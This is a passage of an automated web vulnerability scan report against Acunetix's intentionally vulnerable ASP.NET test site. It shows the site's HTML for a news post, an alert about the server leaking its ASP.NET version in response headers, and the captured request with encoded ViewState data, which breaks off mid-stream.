JvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        24. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgL